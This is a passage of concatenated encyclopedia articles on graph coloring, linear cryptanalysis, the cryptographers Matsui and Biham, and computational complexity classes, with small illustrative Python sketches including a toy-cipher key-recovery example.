{0,1,2}. 
In particular, it is NP-hard to compute the chromatic number.[33]The 3-coloring problem remains NP-complete even on 4-regularplanar graphs.[34]On graphs with maximal degree 3 or less, however,Brooks' theoremimplies that the 3-coloring problem can be solved in linear time. Further, for everyk> 3, ak-coloring of a planar graph exists by thefour color theorem, and it is possible to find such a coloring in polynomial time. However, finding thelexicographicallysmallest 4-coloring of a planar graph is NP-complete.[35] The best knownapproximation algorithmcomputes a coloring of size at most within a factorO(n(log logn)2(log n)−3) of the chromatic number.[36]For allε> 0, approximating the chromatic number withinn1−εisNP-hard.[37] It is also NP-hard to color a 3-colorable graph with 5 colors,[38]4-colorable graph with 7 colours,[38]and ak-colorable graph with(k⌊k/2⌋)−1{\displaystyle \textstyle {\binom {k}{\lfloor k/2\rfloor }}-1}colors fork≥ 5.[39] Computing the coefficients of the chromatic polynomial is♯P-hard. In fact, even computing the value ofχ(G,k){\displaystyle \chi (G,k)}is ♯P-hard at anyrational pointkexcept fork= 1 andk= 2.[40]There is noFPRASfor evaluating the chromatic polynomial at any rational pointk≥ 1.5 except fork= 2 unlessNP=RP.[41] For edge coloring, the proof of Vizing's result gives an algorithm that uses at most Δ+1 colors. However, deciding between the two candidate values for the edge chromatic number is NP-complete.[42]In terms of approximation algorithms, Vizing's algorithm shows that the edge chromatic number can be approximated to within 4/3, and the hardness result shows that no (4/3 −ε)-algorithm exists for anyε > 0unlessP = NP. These are among the oldest results in the literature of approximation algorithms, even though neither paper makes explicit use of that notion.[43] Vertex coloring models to a number ofscheduling problems.[44]In the cleanest form, a given set of jobs need to be assigned to time slots, each job requires one such slot. Jobs can be scheduled in any order, but pairs of jobs may be inconflictin the sense that they may not be assigned to the same time slot, for example because they both rely on a shared resource. The corresponding graph contains a vertex for every job and an edge for every conflicting pair of jobs. The chromatic number of the graph is exactly the minimummakespan, the optimal time to finish all jobs without conflicts. Details of the scheduling problem define the structure of the graph. For example, when assigning aircraft to flights, the resulting conflict graph is aninterval graph, so the coloring problem can be solved efficiently. Inbandwidth allocationto radio stations, the resulting conflict graph is aunit disk graph, so the coloring problem is 3-approximable. Acompileris acomputer programthat translates onecomputer languageinto another. To improve the execution time of the resulting code, one of the techniques ofcompiler optimizationisregister allocation, where the most frequently used values of the compiled program are kept in the fastprocessor registers. Ideally, values are assigned to registers so that they can all reside in the registers when they are used. The textbook approach to this problem is to model it as a graph coloring problem.[45]The compiler constructs aninterference graph, where vertices are variables and an edge connects two vertices if they are needed at the same time. If the graph can be colored withkcolors then any set of variables needed at the same time can be stored in at mostkregisters. 
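To make the register-allocation picture concrete, the sketch below builds an interference graph from hypothetical live ranges and colors it greedily, so that variables that are never live at the same time can share a register. The variable names, live ranges, and the simple ordering heuristic are illustrative assumptions, not the behaviour of any particular compiler.

```python
# Hypothetical live ranges (start, end) for five variables; two variables
# interfere when their ranges overlap, i.e. they are live at the same time.
live = {"a": (0, 4), "b": (1, 3), "c": (2, 6), "d": (5, 8), "e": (7, 9)}

def overlaps(r, s):
    return r[0] <= s[1] and s[0] <= r[1]

interfere = {v: {u for u in live if u != v and overlaps(live[v], live[u])}
             for v in live}

# Greedy coloring of the interference graph: each color is one register.
register = {}
for v in sorted(live, key=lambda v: live[v][0]):       # in order of first use
    used = {register[u] for u in interfere[v] if u in register}
    register[v] = min(r for r in range(len(live)) if r not in used)

print(register)   # variables that are never live together share a register
```

Because the live ranges here are intervals, the interference graph is an interval graph, which is why a simple greedy pass in order of first use already produces an optimal assignment in this toy case.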
The problem of coloring a graph arises in many practical areas such as sports scheduling,[46] designing seating plans,[47] exam timetabling,[48] the scheduling of taxis,[49] and solving Sudoku puzzles.[50]

An important class of improper coloring problems is studied in Ramsey theory, where the graph's edges are assigned colors and there is no restriction on the colors of incident edges. A simple example is the theorem on friends and strangers, which states that in any coloring of the edges of K_6, the complete graph on six vertices, there will be a monochromatic triangle; this is often illustrated by saying that any group of six people either has three mutual strangers or three mutual acquaintances. Ramsey theory is concerned with generalisations of this idea to seek regularity amid disorder, finding general conditions for the existence of monochromatic subgraphs with given structure.

Modular coloring is a type of graph coloring in which each vertex is recolored by the sum of the colors of its adjacent vertices. Let k ≥ 2 be a number of colors, where Z_k is the set of integers modulo k consisting of the elements (or colors) 0, 1, 2, ..., k − 2, k − 1. First, we color each vertex in G using the elements of Z_k, allowing two adjacent vertices to be assigned the same color; in other words, c is a map c: V(G) → Z_k in which adjacent vertices may receive the same color. For each vertex v in G, the color sum of v, σ(v), is the sum of the colors of the vertices adjacent to v, taken mod k: σ(v) = Σ_{u ∈ N(v)} c(u) (mod k), where N(v) is the neighborhood of v. We then recolor each vertex with the new color determined by this sum. The graph G has a modular k-coloring if, for every pair of adjacent vertices a, b, σ(a) ≠ σ(b). The modular chromatic number of G, mc(G), is the minimum value of k such that there exists a modular k-coloring of G.

For example, let there be a vertex v adjacent to vertices with the assigned colors 0, 1, 1, and 3 mod 4 (k = 4). The color sum would be σ(v) = 0 + 1 + 1 + 3 mod 4 = 5 mod 4 = 1; this is the new color of vertex v. We repeat this process for every vertex in G. If two adjacent vertices end up with equal color sums, the chosen assignment is not a modular 4-coloring; if no two adjacent vertices have equal color sums, it is.

Coloring can also be considered for signed graphs and gain graphs.
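A small sketch of the modular-coloring condition described above: it recomputes the color sums σ(v) modulo k and checks that adjacent vertices receive different sums. The path graph and the particular initial assignment are assumptions chosen for the example.

```python
def is_modular_k_coloring(adj, c, k):
    """Check the modular coloring condition: adjacent vertices must get
    different color sums sigma(v) = sum of neighbours' colors mod k."""
    sigma = {v: sum(c[u] for u in adj[v]) % k for v in adj}
    return all(sigma[u] != sigma[v] for v in adj for u in adj[v])

# Toy example: a path 0-1-2-3 with k = 2 and an assignment that works.
adj = {0: {1}, 1: {0, 2}, 2: {1, 3}, 3: {2}}
c = {0: 0, 1: 0, 2: 1, 3: 0}
print(is_modular_k_coloring(adj, c, 2))   # True: sums are 0, 1, 0, 1 along the path
```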
https://en.wikipedia.org/wiki/Graph_coloring
In cryptography, linear cryptanalysis is a general form of cryptanalysis based on finding affine approximations to the action of a cipher. Attacks have been developed for block ciphers and stream ciphers. Linear cryptanalysis is one of the two most widely used attacks on block ciphers; the other is differential cryptanalysis.

The discovery is attributed to Mitsuru Matsui, who first applied the technique to the FEAL cipher (Matsui and Yamagishi, 1992).[1] Subsequently, Matsui published an attack on the Data Encryption Standard (DES), eventually leading to the first experimental cryptanalysis of the cipher reported in the open community (Matsui, 1993; 1994).[2][3] The attack on DES is not generally practical, requiring 2^47 known plaintexts.[3]

A variety of refinements to the attack have been suggested, including using multiple linear approximations or incorporating non-linear expressions, leading to a generalized partitioning cryptanalysis. Evidence of security against linear cryptanalysis is usually expected of new cipher designs.

There are two parts to linear cryptanalysis. The first is to construct linear equations relating plaintext, ciphertext and key bits that have a high bias; that is, whose probabilities of holding (over the space of all possible values of their variables) are as close as possible to 0 or 1. The second is to use these linear equations in conjunction with known plaintext-ciphertext pairs to derive key bits.

For the purposes of linear cryptanalysis, a linear equation expresses the equality of two expressions which consist of binary variables combined with the exclusive-or (XOR) operation. For example, the following equation, from a hypothetical cipher, states that the XOR sum of the first and third plaintext bits (as in a block cipher's block) and the first ciphertext bit is equal to the second bit of the key:

P1 ⊕ P3 ⊕ C1 = K2

In an ideal cipher, any linear equation relating plaintext, ciphertext and key bits would hold with probability 1/2. Since the equations dealt with in linear cryptanalysis will vary in probability, they are more accurately referred to as linear approximations.

The procedure for constructing approximations is different for each cipher. In the most basic type of block cipher, a substitution–permutation network, analysis is concentrated primarily on the S-boxes, the only nonlinear part of the cipher (i.e. the operation of an S-box cannot be encoded in a linear equation). For small enough S-boxes, it is possible to enumerate every possible linear equation relating the S-box's input and output bits, calculate their biases and choose the best ones. Linear approximations for S-boxes then must be combined with the cipher's other actions, such as permutation and key mixing, to arrive at linear approximations for the entire cipher. The piling-up lemma is a useful tool for this combination step. There are also techniques for iteratively improving linear approximations (Matsui 1994).

Having obtained a linear approximation of the form

P_{i1} ⊕ P_{i2} ⊕ ⋯ ⊕ C_{j1} ⊕ C_{j2} ⊕ ⋯ = K_{k1} ⊕ K_{k2} ⊕ ⋯

we can then apply a straightforward algorithm (Matsui's Algorithm 2), using known plaintext-ciphertext pairs, to guess at the values of the key bits involved in the approximation. For each set of values of the key bits on the right-hand side (referred to as a partial key), count how many times the approximation holds true over all the known plaintext-ciphertext pairs; call this count T. The partial key whose T has the greatest absolute difference from half the number of plaintext-ciphertext pairs is designated as the most likely set of values for those key bits.
This is because it is assumed that the correct partial key will cause the approximation to hold with a high bias. The magnitude of the bias is significant here, as opposed to the magnitude of the probability itself. This procedure can be repeated with other linear approximations, obtaining guesses at values of key bits, until the number of unknown key bits is low enough that they can be attacked with brute force.
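The toy sketch below illustrates both parts of the attack on a deliberately tiny 4-bit cipher C = S[S[P ⊕ K0] ⊕ K1] ⊕ K2: it first picks the most biased linear approximation of the S-box, then performs the counting step of Matsui's Algorithm 2 over known plaintext-ciphertext pairs. The S-box, the cipher structure, and the key values are illustrative assumptions, not any real design or Matsui's actual parameters.

```python
from itertools import product

SBOX = [0xE, 0x4, 0xD, 0x1, 0x2, 0xF, 0xB, 0x8,
        0x3, 0xA, 0x6, 0xC, 0x5, 0x9, 0x0, 0x7]     # arbitrary 4-bit S-box
INV = [SBOX.index(x) for x in range(16)]

def parity(x):
    return bin(x).count("1") & 1

# Part 1: find the most biased approximation parity(x & A) == parity(S[x] & B).
def bias(a, b):
    return sum(parity(x & a) == parity(SBOX[x] & b) for x in range(16)) - 8

A, B = max(product(range(1, 16), repeat=2), key=lambda ab: abs(bias(*ab)))

# Part 2 (Algorithm 2 in miniature): guess the last-round key K2, partially
# decrypt each ciphertext through the last S-box, count how often the
# round-1 approximation holds, and keep the guess with the largest |T - N/2|.
K0, K1, K2 = 0x3, 0xA, 0x6                            # unknown keys (toy values)
pairs = [(p, SBOX[SBOX[p ^ K0] ^ K1] ^ K2) for p in range(16)]

def score(k2):
    T = sum(parity(p & A) == parity(INV[c ^ k2] & B) for p, c in pairs)
    return abs(T - len(pairs) / 2)

ranking = sorted(range(16), key=score, reverse=True)
print(ranking[0], K2)   # the true last-round key should rank at or near the top
```

With only sixteen known plaintexts the statistics are noisy, so the true last-round key is only expected to appear at or near the top of the ranking rather than to win outright every time; real attacks use far more data and several approximations.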
https://en.wikipedia.org/wiki/Linear_cryptanalysis
Mitsuru Matsui (松井 充, Matsui Mitsuru, born September 16, 1961) is a Japanese cryptographer and senior researcher for Mitsubishi Electric Company. While researching error-correcting codes in 1990, Matsui was inspired by Eli Biham and Adi Shamir's differential cryptanalysis, and discovered the technique of linear cryptanalysis, published in 1993. Differential and linear cryptanalysis are the two major general techniques known for the cryptanalysis of block ciphers. The following year, Matsui was the first to publicly report an experimental cryptanalysis of DES, using the computing power of twelve workstations over a period of fifty days. He is also the author of the MISTY-1 and MISTY-2 block ciphers, and contributed to the design of Camellia and KASUMI. For his achievements, Matsui received the 2012 RSA Conference Award for Excellence in Mathematics.
https://en.wikipedia.org/wiki/Mitsuru_Matsui
Eli Biham (Hebrew: אלי ביהם) is an Israeli cryptographer and cryptanalyst who is a professor at the Technion – Israel Institute of Technology Computer Science department. From 2008 to 2013, Biham was the dean of the Technion Computer Science department, after serving for two years as chief of the CS graduate school. Biham invented (publicly) differential cryptanalysis,[1] for which he received his Ph.D. while working under Adi Shamir. Biham has taken part in the design of several new cryptographic primitives.
https://en.wikipedia.org/wiki/Eli_Biham
Incomputational complexity theory, acomplexity classis asetofcomputational problems"of related resource-basedcomplexity".[1]The two most commonly analyzed resources aretimeandmemory. In general, a complexity class is defined in terms of a type of computational problem, amodel of computation, and a bounded resource liketimeormemory. In particular, most complexity classes consist ofdecision problemsthat are solvable with aTuring machine, and are differentiated by their time or space (memory) requirements. For instance, the classPis the set of decision problems solvable by a deterministic Turing machine inpolynomial time. There are, however, many complexity classes defined in terms of other types of problems (e.g.counting problemsandfunction problems) and using other models of computation (e.g.probabilistic Turing machines,interactive proof systems,Boolean circuits, andquantum computers). The study of the relationships between complexity classes is a major area of research intheoretical computer science. There are often general hierarchies of complexity classes; for example, it is known that a number of fundamental time and space complexity classes relate to each other in the following way:L⊆NL⊆P⊆NP⊆PSPACE⊆EXPTIME⊆NEXPTIME⊆EXPSPACE(where ⊆ denotes thesubsetrelation). However, many relationships are not yet known; for example, one of the most famousopen problemsin computer science concerns whetherPequalsNP. The relationships between classes often answer questions about the fundamental nature of computation. ThePversusNPproblem, for instance, is directly related to questions of whethernondeterminismadds any computational power to computers and whether problems having solutions that can be quickly checked for correctness can also be quickly solved. Complexity classes aresetsof relatedcomputational problems. They are defined in terms of the computational difficulty of solving the problems contained within them with respect to particular computational resources like time or memory. More formally, the definition of a complexity class consists of three things: a type of computational problem, a model of computation, and a bounded computational resource. In particular, most complexity classes consist ofdecision problemsthat can be solved by aTuring machinewith boundedtimeorspaceresources. For example, the complexity classPis defined as the set ofdecision problemsthat can be solved by adeterministic Turing machineinpolynomial time. Intuitively, acomputational problemis just a question that can be solved by analgorithm. For example, "is thenatural numbern{\displaystyle n}prime?" is a computational problem. A computational problem is mathematically represented as thesetof answers to the problem. In the primality example, the problem (call itPRIME{\displaystyle {\texttt {PRIME}}}) is represented by the set of all natural numbers that are prime:PRIME={n∈N|nis prime}{\displaystyle {\texttt {PRIME}}=\{n\in \mathbb {N} |n{\text{ is prime}}\}}. In the theory of computation, these answers are represented asstrings; for example, in the primality example the natural numbers could be represented as strings ofbitsthat representbinary numbers. For this reason, computational problems are often synonymously referred to as languages, since strings of bits representformal languages(a concept borrowed fromlinguistics); for example, saying that thePRIME{\displaystyle {\texttt {PRIME}}}problem is in the complexity classPis equivalent to saying that the languagePRIME{\displaystyle {\texttt {PRIME}}}is inP. 
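As a minimal illustration of the identification of problems with languages, the sketch below "decides" the language PRIME for inputs given as binary strings. Trial division is simply the most obvious correct decider; note that it runs in time exponential in the length of the input string, so placing PRIME in P actually requires a cleverer algorithm (the AKS primality test).

```python
def accepts_prime(w: str) -> bool:
    """Accept exactly those binary strings that encode prime numbers,
    i.e. decide membership in the language PRIME."""
    n = int(w, 2)                      # interpret the input string as a binary number
    if n < 2:
        return False                   # reject
    return all(n % d for d in range(2, int(n ** 0.5) + 1))   # accept iff prime

print(accepts_prime("101"), accepts_prime("110"))   # 5 is prime, 6 is not
```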
The most commonly analyzed problems in theoretical computer science aredecision problems—the kinds of problems that can be posed asyes–no questions. The primality example above, for instance, is an example of a decision problem as it can be represented by the yes–no question "is thenatural numbern{\displaystyle n}prime". In terms of the theory of computation, a decision problem is represented as the set of input strings that a computer running a correctalgorithmwould answer "yes" to. In the primality example,PRIME{\displaystyle {\texttt {PRIME}}}is the set of strings representing natural numbers that, when input into a computer running an algorithm that correctlytests for primality, the algorithm answers "yes, this number is prime". This "yes-no" format is often equivalently stated as "accept-reject"; that is, an algorithm "accepts" an input string if the answer to the decision problem is "yes" and "rejects" if the answer is "no". While some problems cannot easily be expressed as decision problems, they nonetheless encompass a broad range of computational problems.[2]Other types of problems that certain complexity classes are defined in terms of include: To make concrete the notion of a "computer", in theoretical computer science problems are analyzed in the context of acomputational model. Computational models make exact the notions of computational resources like "time" and "memory". Incomputational complexity theory, complexity classes deal with theinherentresource requirements of problems and not the resource requirements that depend upon how a physical computer is constructed. For example, in the real world different computers may require different amounts of time and memory to solve the same problem because of the way that they have been engineered. By providing an abstract mathematical representations of computers, computational models abstract away superfluous complexities of the real world (like differences inprocessorspeed) that obstruct an understanding of fundamental principles. The most commonly used computational model is theTuring machine. While other models exist and many complexity classes are defined in terms of them (see section"Other models of computation"), the Turing machine is used to define most basic complexity classes. With the Turing machine, instead of using standard units of time like the second (which make it impossible to disentangle running time from the speed of physical hardware) and standard units of memory likebytes, the notion of time is abstracted as the number of elementary steps that a Turing machine takes to solve a problem and the notion of memory is abstracted as the number of cells that are used on the machine's tape. These are explained in greater detail below. It is also possible to use theBlum axiomsto define complexity classes without referring to a concretecomputational model, but this approach is less frequently used in complexity theory. ATuring machineis a mathematical model of a general computing machine. It is the most commonly used model in complexity theory, owing in large part to the fact that it is believed to be as powerful as any other model of computation and is easy to analyze mathematically. Importantly, it is believed that if there exists an algorithm that solves a particular problem then there also exists a Turing machine that solves that same problem (this is known as theChurch–Turing thesis); this means that it is believed thateveryalgorithm can be represented as a Turing machine. 
Mechanically, a Turing machine (TM) manipulates symbols (generally restricted to the bits 0 and 1 to provide an intuitive connection to real-life computers) contained on an infinitely long strip of tape. The TM can read and write, one at a time, using a tape head. Operation is fully determined by a finite set of elementary instructions such as "in state 42, if the symbol seen is 0, write a 1; if the symbol seen is 1, change into state 17; in state 17, if the symbol seen is 0, write a 1 and change to state 6". The Turing machine starts with only the input string on its tape and blanks everywhere else. The TM accepts the input if it enters a designated accept state and rejects the input if it enters a reject state. The deterministic Turing machine (DTM) is the most basic type of Turing machine. It uses a fixed set of rules to determine its future actions (which is why it is called "deterministic"). A computational problem can then be defined in terms of a Turing machine as the set of input strings that a particular Turing machine accepts. For example, the primality problemPRIME{\displaystyle {\texttt {PRIME}}}from above is the set of strings (representing natural numbers) that a Turing machine running an algorithm that correctlytests for primalityaccepts. A Turing machine is said torecognizea language (recall that "problem" and "language" are largely synonymous in computability and complexity theory) if it accepts all inputs that are in the language and is said todecidea language if it additionally rejects all inputs that are not in the language (certain inputs may cause a Turing machine to run forever, sodecidabilityplaces the additional constraint overrecognizabilitythat the Turing machine must halt on all inputs). A Turing machine that "solves" a problem is generally meant to mean one that decides the language. Turing machines enable intuitive notions of "time" and "space". Thetime complexityof a TM on a particular input is the number of elementary steps that the Turing machine takes to reach either an accept or reject state. Thespace complexityis the number of cells on its tape that it uses to reach either an accept or reject state. The deterministic Turing machine (DTM) is a variant of the nondeterministic Turing machine (NTM). Intuitively, an NTM is just a regular Turing machine that has the added capability of being able to explore multiple possible future actions from a given state, and "choosing" a branch that accepts (if any accept). That is, while a DTM must follow only one branch of computation, an NTM can be imagined as a computation tree, branching into many possible computational pathways at each step (see image). If at least one branch of the tree halts with an "accept" condition, then the NTM accepts the input. In this way, an NTM can be thought of as simultaneously exploring all computational possibilities in parallel and selecting an accepting branch.[3]NTMs are not meant to be physically realizable models, they are simply theoretically interesting abstract machines that give rise to a number of interesting complexity classes (which often do have physically realizable equivalent definitions). Thetime complexityof an NTM is the maximum number of steps that the NTM uses onanybranch of its computation.[4]Similarly, thespace complexityof an NTM is the maximum number of cells that the NTM uses on any branch of its computation. DTMs can be viewed as a special case of NTMs that do not make use of the power of nondeterminism. 
Hence, every computation that can be carried out by a DTM can also be carried out by an equivalent NTM. It is also possible to simulate any NTM using a DTM (the DTM will simply compute every possible computational branch one-by-one). Hence, the two are equivalent in terms of computability. However, simulating an NTM with a DTM often requires greater time and/or memory resources; as will be seen, how significant this slowdown is for certain classes of computational problems is an important question in computational complexity theory. Complexity classes group computational problems by their resource requirements. To do this, computational problems are differentiated byupper boundson the maximum amount of resources that the most efficient algorithm takes to solve them. More specifically, complexity classes are concerned with therate of growthin the resources required to solve particular computational problems as the input size increases. For example, the amount of time it takes to solve problems in the complexity classPgrows at apolynomialrate as the input size increases, which is comparatively slow compared to problems in the exponential complexity classEXPTIME(or more accurately, for problems inEXPTIMEthat are outside ofP, sinceP⊆EXPTIME{\displaystyle {\mathsf {P}}\subseteq {\mathsf {EXPTIME}}}). Note that the study of complexity classes is intended primarily to understand theinherentcomplexity required to solve computational problems. Complexity theorists are thus generally concerned with finding the smallest complexity class that a problem falls into and are therefore concerned with identifying which class a computational problem falls into using themost efficientalgorithm. There may be an algorithm, for instance, that solves a particular problem in exponential time, but if the most efficient algorithm for solving this problem runs in polynomial time then the inherent time complexity of that problem is better described as polynomial. Thetime complexityof an algorithm with respect to the Turing machine model is the number of steps it takes for a Turing machine to run an algorithm on a given input size. Formally, the time complexity for an algorithm implemented with a Turing machineM{\displaystyle M}is defined as the functiontM:N→N{\displaystyle t_{M}:\mathbb {N} \to \mathbb {N} }, wheretM(n){\displaystyle t_{M}(n)}is the maximum number of steps thatM{\displaystyle M}takes on any input of lengthn{\displaystyle n}. In computational complexity theory, theoretical computer scientists are concerned less with particular runtime values and more with the general class of functions that the time complexity function falls into. For instance, is the time complexity function apolynomial? Alogarithmic function? Anexponential function? Or another kind of function? Thespace complexityof an algorithm with respect to the Turing machine model is the number of cells on the Turing machine's tape that are required to run an algorithm on a given input size. Formally, the space complexity of an algorithm implemented with a Turing machineM{\displaystyle M}is defined as the functionsM:N→N{\displaystyle s_{M}:\mathbb {N} \to \mathbb {N} }, wheresM(n){\displaystyle s_{M}(n)}is the maximum number of cells thatM{\displaystyle M}uses on any input of lengthn{\displaystyle n}. Complexity classes are often defined using granular sets of complexity classes calledDTIMEandNTIME(for time complexity) andDSPACEandNSPACE(for space complexity). 
Usingbig O notation, they are defined as follows: Pis the class of problems that are solvable by adeterministic Turing machineinpolynomial timeandNPis the class of problems that are solvable by anondeterministic Turing machinein polynomial time. Or more formally, Pis often said to be the class of problems that can be solved "quickly" or "efficiently" by a deterministic computer, since thetime complexityof solving a problem inPincreases relatively slowly with the input size. An important characteristic of the classNPis that it can be equivalently defined as the class of problems whose solutions areverifiableby a deterministic Turing machine in polynomial time. That is, a language is inNPif there exists adeterministicpolynomial time Turing machine, referred to as the verifier, that takes as input a stringw{\displaystyle w}anda polynomial-sizecertificatestringc{\displaystyle c}, and acceptsw{\displaystyle w}ifw{\displaystyle w}is in the language and rejectsw{\displaystyle w}ifw{\displaystyle w}is not in the language. Intuitively, the certificate acts as aproofthat the inputw{\displaystyle w}is in the language. Formally:[5] This equivalence between the nondeterministic definition and the verifier definition highlights a fundamental connection betweennondeterminismand solution verifiability. Furthermore, it also provides a useful method for proving that a language is inNP—simply identify a suitable certificate and show that it can be verified in polynomial time. While there might seem to be an obvious difference between the class of problems that are efficiently solvable and the class of problems whose solutions are merely efficiently checkable,PandNPare actually at the center of one of the most famous unsolved problems in computer science: thePversusNPproblem. While it is known thatP⊆NP{\displaystyle {\mathsf {P}}\subseteq {\mathsf {NP}}}(intuitively, deterministic Turing machines are just a subclass of nondeterministic Turing machines that don't make use of their nondeterminism; or under the verifier definition,Pis the class of problems whose polynomial time verifiers need only receive the empty string as their certificate), it is not known whetherNPis strictly larger thanP. IfP=NP, then it follows that nondeterminism providesno additional computational powerover determinism with regards to the ability to quickly find a solution to a problem; that is, being able to exploreall possible branchesof computation providesat mosta polynomial speedup over being able to explore only a single branch. Furthermore, it would follow that if there exists a proof for a problem instance and that proof can be quickly be checked for correctness (that is, if the problem is inNP), then there also exists an algorithm that can quicklyconstructthat proof (that is, the problem is inP).[6]However, the overwhelming majority of computer scientists believe thatP≠NP{\displaystyle {\mathsf {P}}\neq {\mathsf {NP}}},[7]and mostcryptographic schemesemployed today rely on the assumption thatP≠NP{\displaystyle {\mathsf {P}}\neq {\mathsf {NP}}}.[8] EXPTIME(sometimes shortened toEXP) is the class of decision problems solvable by a deterministic Turing machine in exponential time andNEXPTIME(sometimes shortened toNEXP) is the class of decision problems solvable by a nondeterministic Turing machine in exponential time. Or more formally, EXPTIMEis a strict superset ofPandNEXPTIMEis a strict superset ofNP. It is further the case thatEXPTIME⊆{\displaystyle \subseteq }NEXPTIME. 
It is not known whether this is proper, but ifP=NPthenEXPTIMEmust equalNEXPTIME. While it is possible to definelogarithmictime complexity classes, these are extremely narrow classes as sublinear times do not even enable a Turing machine to read the entire input (becauselog⁡n<n{\displaystyle \log n<n}).[a][9]However, there are a meaningful number of problems that can be solved in logarithmic space. The definitions of these classes require atwo-tape Turing machineso that it is possible for the machine to store the entire input (it can be shown that in terms ofcomputabilitythe two-tape Turing machine is equivalent to the single-tape Turing machine).[10]In the two-tape Turing machine model, one tape is the input tape, which is read-only. The other is the work tape, which allows both reading and writing and is the tape on which the Turing machine performs computations. The space complexity of the Turing machine is measured as the number of cells that are used on the work tape. L(sometimes lengthened toLOGSPACE) is then defined as the class of problems solvable in logarithmic space on a deterministic Turing machine andNL(sometimes lengthened toNLOGSPACE) is the class of problems solvable in logarithmic space on a nondeterministic Turing machine. Or more formally,[10] It is known thatL⊆NL⊆P{\displaystyle {\mathsf {L}}\subseteq {\mathsf {NL}}\subseteq {\mathsf {P}}}. However, it is not known whether any of these relationships is proper. The complexity classesPSPACEandNPSPACEare the space analogues toPandNP. That is,PSPACEis the class of problems solvable in polynomial space by a deterministic Turing machine andNPSPACEis the class of problems solvable in polynomial space by a nondeterministic Turing machine. More formally, While it is not known whetherP=NP,Savitch's theoremfamously showed thatPSPACE=NPSPACE. It is also known thatP⊆PSPACE{\displaystyle {\mathsf {P}}\subseteq {\mathsf {PSPACE}}}, which follows intuitively from the fact that, since writing to a cell on a Turing machine's tape is defined as taking one unit of time, a Turing machine operating in polynomial time can only write to polynomially many cells. It is suspected thatPis strictly smaller thanPSPACE, but this has not been proven. The complexity classesEXPSPACEandNEXPSPACEare the space analogues toEXPTIMEandNEXPTIME. That is,EXPSPACEis the class of problems solvable in exponential space by a deterministic Turing machine andNEXPSPACEis the class of problems solvable in exponential space by a nondeterministic Turing machine. Or more formally, Savitch's theoremshowed thatEXPSPACE=NEXPSPACE. This class is extremely broad: it is known to be a strict superset ofPSPACE,NP, andP, and is believed to be a strict superset ofEXPTIME. Complexity classes have a variety ofclosureproperties. For example, decision classes may be closed undernegation,disjunction,conjunction, or even under allBoolean operations. Moreover, they might also be closed under a variety of quantification schemes.P, for instance, is closed under all Boolean operations, and under quantification over polynomially sized domains. Closure properties can be helpful in separating classes—one possible route to separating two complexity classes is to find some closure property possessed by one class but not by the other. 
Each classXthat is not closed under negation has a complement classco-X, which consists of the complements of the languages contained inX(i.e.co-X={L|L¯∈X}{\displaystyle {\textsf {co-X}}=\{L|{\overline {L}}\in {\mathsf {X}}\}}).co-NP, for instance, is one important complement complexity class, and sits at the center of the unsolved problem over whetherco-NP=NP. Closure properties are one of the key reasons many complexity classes are defined in the way that they are.[11]Take, for example, a problem that can be solved inO(n){\displaystyle O(n)}time (that is, in linear time) and one that can be solved in, at best,O(n1000){\displaystyle O(n^{1000})}time. Both of these problems are inP, yet the runtime of the second grows considerably faster than the runtime of the first as the input size increases. One might ask whether it would be better to define the class of "efficiently solvable" problems using some smaller polynomial bound, likeO(n3){\displaystyle O(n^{3})}, rather than all polynomials, which allows for such large discrepancies. It turns out, however, that the set of all polynomials is the smallest class of functions containing the linear functions that is also closed under addition, multiplication, and composition (for instance,O(n3)∘O(n2)=O(n6){\displaystyle O(n^{3})\circ O(n^{2})=O(n^{6})}, which is a polynomial butO(n6)>O(n3){\displaystyle O(n^{6})>O(n^{3})}).[11]Since we would like composing one efficient algorithm with another efficient algorithm to still be considered efficient, the polynomials are the smallest class that ensures composition of "efficient algorithms".[12](Note that the definition ofPis also useful because, empirically, almost all problems inPthat are practically useful do in fact have low order polynomial runtimes, and almost all problems outside ofPthat are practically useful do not have any known algorithms with small exponential runtimes, i.e. withO(cn){\displaystyle O(c^{n})}runtimes wherecis close to 1.[13]) Many complexity classes are defined using the concept of areduction. A reduction is a transformation of one problem into another problem, i.e. a reduction takes inputs from one problem and transforms them into inputs of another problem. For instance, you can reduce ordinary base-10 additionx+y{\displaystyle x+y}to base-2 addition by transformingx{\displaystyle x}andy{\displaystyle y}to their base-2 notation (e.g. 5+7 becomes 101+111). Formally, a problemX{\displaystyle X}reduces to a problemY{\displaystyle Y}if there exists a functionf{\displaystyle f}such that for everyx∈Σ∗{\displaystyle x\in \Sigma ^{*}},x∈X{\displaystyle x\in X}if and only iff(x)∈Y{\displaystyle f(x)\in Y}. Generally, reductions are used to capture the notion of a problem being at least as difficult as another problem. Thus we are generally interested in using a polynomial-time reduction, since any problemX{\displaystyle X}that can be efficiently reduced to another problemY{\displaystyle Y}is no more difficult thanY{\displaystyle Y}. Formally, a problemX{\displaystyle X}is polynomial-time reducible to a problemY{\displaystyle Y}if there exists apolynomial-timecomputable functionp{\displaystyle p}such that for allx∈Σ∗{\displaystyle x\in \Sigma ^{*}},x∈X{\displaystyle x\in X}if and only ifp(x)∈Y{\displaystyle p(x)\in Y}. Note that reductions can be defined in many different ways. Common reductions areCook reductions,Karp reductionsandLevin reductions, and can vary based on resource bounds, such aspolynomial-time reductionsandlog-space reductions. 
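As a concrete example of a Karp-style polynomial-time reduction between decision problems, the sketch below transforms an instance of graph 3-colorability into a Boolean satisfiability instance in conjunctive normal form (clauses given as lists of signed integers, DIMACS-style). The particular encoding is one standard textbook choice, used here purely for illustration.

```python
def three_coloring_to_sat(n, edges):
    """Map 'is this n-vertex graph 3-colorable?' to 'is this CNF satisfiable?'.
    Variable number 3*v + c + 1 stands for 'vertex v gets color c'."""
    var = lambda v, c: 3 * v + c + 1
    clauses = []
    for v in range(n):
        clauses.append([var(v, 0), var(v, 1), var(v, 2)])      # some color
        for c in range(3):                                      # at most one color
            for d in range(c + 1, 3):
                clauses.append([-var(v, c), -var(v, d)])
    for u, v in edges:
        for c in range(3):                                      # endpoints differ
            clauses.append([-var(u, c), -var(v, c)])
    return clauses

# The transformation itself runs in time polynomial (in fact linear) in n + |E|,
# and the resulting formula is satisfiable if and only if the graph is 3-colorable.
print(three_coloring_to_sat(3, [(0, 1), (1, 2), (0, 2)])[:4])
```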
